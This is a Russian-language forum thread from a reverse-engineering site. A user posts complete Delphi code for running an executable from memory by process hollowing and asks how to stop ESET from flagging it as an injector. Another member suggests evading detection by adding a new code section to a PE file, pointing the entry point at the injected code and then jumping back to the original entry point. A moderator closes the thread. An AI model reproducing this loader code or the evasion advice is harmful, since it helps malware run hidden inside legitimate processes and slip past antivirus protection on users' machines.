[Delphi]Запуск программы из памяти и реакция антивируса

Сейчас на форуме: Rio, tyns777, zombi-vadim (+7 невидимых)

Посл.ответ	Сообщение
Uz_ Ранг: 12.0 (новичок) Активность: 0.02↘0 Статус: Участник	Создано: 18 ноября 2014 14:38 · Поправил: Uz_ · Личное сообщение · #1 Значит есть всем известная функция, как только я пытаюсь выполнить ее в программе без формы - ESET SMART SECURITY 7 удаляет ее, мол модифицированный W32/Injector, но, как только я создаю приложение с формой и выполняю тот-же самый код - антивирус молчит, не подскажете как обойти? Или может способ есть другой - через jmp прыгнуть ? Code: type TBuff=record p:pointer; sz:cardinal; end; PIMAGE_NT_HEADERS=^IMAGE_NT_HEADERS; PIMAGE_DOS_HEADER=^IMAGE_DOS_HEADER; function ZwUnmapViewOfSection(pi:THANDLE;var x:pointer):DWord;stdcall; external 'ntdll.dll' name 'ZwUnmapViewOfSection'; function FieldOffset(const Struc; const Field): Cardinal; begin Result := Cardinal(@Field) - Cardinal(@Struc); end; function IMAGE_FIRST_SECTION (NtHeader: PIMAGE_NT_HEADERS): PIMAGESECTIONHEADER; begin Result := PIMAGESECTIONHEADER(Cardinal(NtHeader) + FieldOffset(NtHeader^, NtHeader^.OptionalHeader) + NtHeader^.FileHeader.SizeOfOptionalHeader); end; function protect(characteristics: ULONG): ULONG; const mapping: array [0..7] of ULONG = ( PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE, PAGE_EXECUTE_READWRITE); begin Result := mapping[characteristics shr 29]; end; function RunMemAs(buff:TBuff;exe:string):boolean; var si:TStartupInfo; pi:TProcessInformation; ctx:tcontext; x,p,q:Pointer; sz:dword; pnt:PIMAGE_NT_HEADERS; sect:PIMAGESECTIONHEADER; i:integer; begin result:=false; if buff.p=nil then exit; fillchar(si,sizeof(si),0); si.cb:=sizeof(si); if not CreateProcess(0, PChar(exe), 0, 0,FALSE,CREATE_SUSPENDED, 0, 0, si, pi) then exit; ctx.ContextFlags:=CONTEXT_INTEGER; GetThreadContext(pi.hThread,ctx); ReadProcessMemory(pi.hProcess, PAnsiChar(ctx.Ebx)+8,@x,sizeof(x),sz); ZwUnmapViewOfSection(pi.hProcess, x); p:=buff.p; pnt:=PIMAGE_NT_HEADERS(PAnsiChar(p)+ PIMAGE_DOS_HEADER(p)^._lfanew); q:=VirtualAllocEx(pi.hProcess, pointer(pnt^.OptionalHeader.ImageBase), pnt^.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(pi.hProcess, q, p, pnt^.OptionalHeader.SizeOfHeaders,sz); sect:=IMAGE_FIRST_SECTION(pnt); for i := 0 to pnt^.FileHeader.NumberOfSections-1 do begin WriteProcessMemory(pi.hProcess, PAnsiChar(q) + sect.VirtualAddress, PAnsiChar(p) + sect.PointerToRawData, sect.SizeOfRawData, sz); VirtualProtectEx(pi.hProcess, PAnsiChar(q) + sect.VirtualAddress, sect.Misc.VirtualSize, protect(sect.Characteristics),sz); Inc(sect); end; WriteProcessMemory(pi.hProcess, PAnsiChar(ctx.Ebx) + 8, @q, sizeof(q),sz); ctx.Eax:=integer(q)+ pnt^.OptionalHeader.AddressOfEntryPoint; SetThreadContext(pi.hThread, ctx); ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); end; Пробовал обойти так: http://delfcode.ru/forum/10-1152-1 - палит все равно.

VodoleY Ранг: 488.1 (мудрец), 272thx Активность: 0.35↘0 Статус: Участник	Создано: 18 ноября 2014 14:48 · Поправил: VodoleY · Личное сообщение · #2 Uz_ модификация памяти чужого процесса это подозрительная активность в 80проц антивируса.. типа эвристика такая.. секция кода как бы должна быть редонли вообще после ХР запрещено исполнять код в стеке, не говоря о том чтоб морфить секцию кода. это разрешено ток избранным.. типа вмпрота который в базе антивирусов зарегистрирован ----- Наша работа во тьме, Мы делаем, что умеем. Мы отдаем, что имеем, Наша работа во тьме....
Uz_ Ранг: 12.0 (новичок) Активность: 0.02↘0 Статус: Участник	Создано: 18 ноября 2014 14:54 · Личное сообщение · #3 VodoleY пишет: Uz_ модификация памяти чужого процесса это подозрительная активность в 80проц антивируса.. типа эвристика такая.. секция кода как бы должна быть редонливообще после ХР запрещено исполнять код в стеке, не говоря о том чтоб морфить секцию кода. это разрешено ток избранным.. типа вмпрота который в базе антивирусов зарегистрирован Ок, а если подправить точку входа и туда jmp адресс запихать?
VodoleY Ранг: 488.1 (мудрец), 272thx Активность: 0.35↘0 Статус: Участник	Создано: 18 ноября 2014 15:13 · Личное сообщение · #4 Uz_ тогда уже прицепи секцию еще одну.. кода.. на нее EP делай свое черное дело, и прыгай на ОЕР ----- Наша работа во тьме, Мы делаем, что умеем. Мы отдаем, что имеем, Наша работа во тьме....
Uz_ Ранг: 12.0 (новичок) Активность: 0.02↘0 Статус: Участник	Создано: 18 ноября 2014 15:26 · Личное сообщение · #5 VodoleY пишет: Uz_ тогда уже прицепи секцию еще одну.. кода.. на нее EP делай свое черное дело, и прыгай на ОЕР Не подскажешь какие функции гуглить?
VodoleY Ранг: 488.1 (мудрец), 272thx Активность: 0.35↘0 Статус: Участник	Создано: 18 ноября 2014 15:42 · Личное сообщение · #6 Uz_ пишет: Не подскажешь какие функции гуглить? какие в пень функи? любым РЕ едитором лепиш пустую секцию ставиш флаги что секция кода, ЕР ставиш на нее.. НА СВОЙ КОД.. кодиш.. jmp OEP в конце ----- Наша работа во тьме, Мы делаем, что умеем. Мы отдаем, что имеем, Наша работа во тьме....
Hellspawn Ранг: 990.2 (! ! !), 380thx Активность: 0.68↘0 Статус: Модератор Author of DiE	Создано: 18 ноября 2014 16:02 · Личное сообщение · #7 батенька, это вам на античат надо или еще куда. закрыто ----- [nice coder and reverser]

Для печати